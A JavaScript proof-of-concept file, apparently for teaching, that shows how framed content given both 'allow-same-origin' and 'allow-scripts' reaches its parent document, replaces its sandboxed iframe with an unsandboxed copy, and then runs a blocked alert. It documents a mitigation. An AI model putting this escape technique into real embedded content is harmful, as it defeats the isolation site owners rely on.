/**
 * Guard: this script only makes sense when the document is framed.
 * When it turns out to be the top-level document (or its own parent),
 * show an explanation in the page and abort by throwing.
 * NOTE(review): `this` is the global object only in a classic script —
 * confirm the file is not loaded as an ES module, where `this` is undefined.
 */
if (window.top === this || window.parent === this) {
  const notLoadedInFrame =
    "This page is meant to be loaded from within an iframe to demonstrate you can bypass sandbox attribute, when a combination of 'allow-same-origin' and 'allow-scripts' is used.";
  document.body.innerText = notLoadedInFrame;
  throw new Error(notLoadedInFrame);
}
/**
 * Stand-in for an action the original sandbox forbade (`alert` requires
 * `allow-modals`). `escape()` only calls it once no `#escapeMe` frame is
 * left in the parent document, i.e. when the script is running inside
 * the replacement frame that carries no `sandbox` attribute.
 */
const illegalCode = () => {
  const notice =
    "You should not see me, because original iframe did not have 'allow-modals'. Kid page had allow-scripts and same-origin though. A new iframe without sandbox attribute was created - and here I am.";
  alert(notice);
};
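/**
 * Demonstrates why `sandbox="allow-scripts allow-same-origin"` is not an
 * isolation boundary for same-origin content: with both flags the framed
 * document is same-origin with its parent, so it can reach
 * `parent.document`, append a fresh iframe that has no `sandbox`
 * attribute, and remove the sandboxed one.
 *
 * Flow across two loads of kid.htm:
 *   1. `#escapeMe` is found in the parent: a replacement `#escapedAlready`
 *      frame (same `src`) is appended and the original is removed.
 *   2. `#escapeMe` is gone: the previously blocked `illegalCode()` runs.
 *
 * Mitigation: do not grant `allow-same-origin` together with `allow-scripts`
 * to content you need contained; serve such content from a separate origin
 * (or drop one of the two flags) so `parent.document` is not reachable.
 *
 * Note: the name shadows the deprecated global `escape()`; it is kept
 * because the inline call at the end of this script depends on it.
 *
 * @returns {void}
 */
const escape = () => {
  document.body.innerText = "Loaded into a frame.";
  const parentDocument = window.parent.document;
  // Single lookup; the original queried the same id twice.
  const container = parentDocument.getElementById("escapeMe");
  if (container != null) {
    // Recreate and insert an iframe without sandbox attribute that
    // plays by our rules.
    const replacement = parentDocument.createElement("iframe");
    replacement.setAttribute("src", "kid.htm");
    replacement.setAttribute("id", "escapedAlready");
    parentDocument.body.append(replacement);
    // Remove original iframe (avoid an infinite loop): once `#escapeMe`
    // is gone, the next load of kid.htm takes the `else` branch.
    container.remove();
  } else {
    // Execute code that would be prevented by original iframe's sandbox.
    illegalCode();
  }
};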
// Entry point: run the demo as soon as the script executes.
escape();